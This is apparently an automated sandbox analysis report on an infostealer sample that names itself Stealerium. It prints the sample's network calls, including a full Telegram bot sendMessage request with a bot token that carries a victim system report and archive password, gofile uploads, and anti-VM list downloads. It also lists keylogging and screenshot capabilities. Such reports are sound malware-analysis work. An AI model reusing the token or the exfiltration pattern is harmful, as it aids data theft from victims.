Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /servers HTTP/1.1Host: api.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/sendMessage?chat_id=1386072644&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%206%3A28%3A02%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20767668%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20MKU_6MO7%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%8D%93%20%2APorn%20websites%2A%20%28No%20data%29%0A%0A%F0%9F%8C%90%20%2ABrowsers%3A%2A%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History%3A%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%F0%9F%97%83%20%2ASoftware%3A%2A%0A%0A%F0%9F%A7%AD%20%2ADevice%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%F0%9F%A6%A0%20%2AInstallation%3A%2A%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Startup%20disabled%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Clipper%20not%20installed%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Keylogger%20not%20installed%0A%0A%F0%9F%93%84%20%2AFile%20Grabber%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images%3A%2020%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents%3A%2030%0A%0A%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FGyFZhD%29%0A%F0%9F%94%90%20Archive%20password%20is%3A%20%22ee6368278fe03ac91c5f409f73928818%22%60%60%60&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: 180.182.11.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: api.gofile.io
Source: global traffic	DNS traffic detected: DNS query: store5.gofile.io
Source: global traffic	DNS traffic detected: DNS query: szurubooru.zulipchat.com

Source: unknown

HTTP traffic detected: POST /uploadfile HTTP/1.1Content-Type: multipart/form-data; boundary="5829e05e-a172-4b44-aff6-61726419cf46"Host: store5.gofile.ioContent-Length: 118541Expect: 100-continueConnection: Keep-Alive

Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.gofile.io
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83875D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838846000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store5.gofile.io
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8387AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://szurubooru.zulipchat.com
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/binaryformatter
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/servers
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838493000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83875D000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/getMe
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83875D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/sendMessage
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838733000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83875D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/sendMessage?chat_id=13860
Source: tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime8
Source: uyz4YPUyc9.exe, 00000000.00000002.2314206876.000001D850FE0000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/icsharpcode/SharpZipLib
Source: uyz4YPUyc9.exe	String found in binary or memory: https://github.com/kgnfth
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838486000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/GyFZhD
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8387A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/GyFZhD)
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: uyz4YPUyc9.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/
Source: uyz4YPUyc9.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt
Source: uyz4YPUyc9.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt
Source: uyz4YPUyc9.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt
Source: uyz4YPUyc9.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt
Source: uyz4YPUyc9.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt
Source: uyz4YPUyc9.exe	String found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt
Source: uyz4YPUyc9.exe, 00000000.00000002.2316412793.000001D852793000.00000004.00000020.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/icsharpcode/SharpZipLib/33f64eb0f28cdd2b084cb822fcc224c7c5aba553/
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store5.gofile.io
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store5.gofile.io/X
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83857B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store5.gofile.io/uploadfile
Source: tmp20C7.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org
Source: tmp20C7.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp20C7.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83875D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://szurubooru.zulipchat.com
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8387AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://szurubooru.zulipchat.com/api/v1/messages
Source: tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpCD12.tmp.dat.0.dr, tmpB6F1.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmp20C7.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org
Source: tmp20C7.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: tmp20C7.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8389B2000.00000004.00000800.00020000.00000000.sdmp, History.txt.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: tmpE304.tmp.dat.0.dr, tmp20C7.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp20C7.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tmpE304.tmp.dat.0.dr, tmp20C7.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: tmpE304.tmp.dat.0.dr, tmp20C7.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.244:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.210.246.148:443 -> 192.168.2.5:49733 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: uyz4YPUyc9.exe, DesktopScreenshot.cs

.Net Code: Make

Contains functionality to log keystrokes (.Net Source)

Source: uyz4YPUyc9.exe, Keylogger.cs	.Net Code: SetHook
Source: uyz4YPUyc9.exe, Keylogger.cs	.Net Code: KeyboardLayout

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File deleted: C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\AFWAAFRXKO.png	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File deleted: C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IVHSHTCODI\AFWAAFRXKO.png	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File deleted: C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDSOXXXWOA.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File deleted: C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UQMPCTZARJ\XQACHMZIHU.png	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	File deleted: C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\PSAMNLJHZW.jpg	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: uyz4YPUyc9.exe, type: SAMPLE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.0.uyz4YPUyc9.exe.1d836200000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
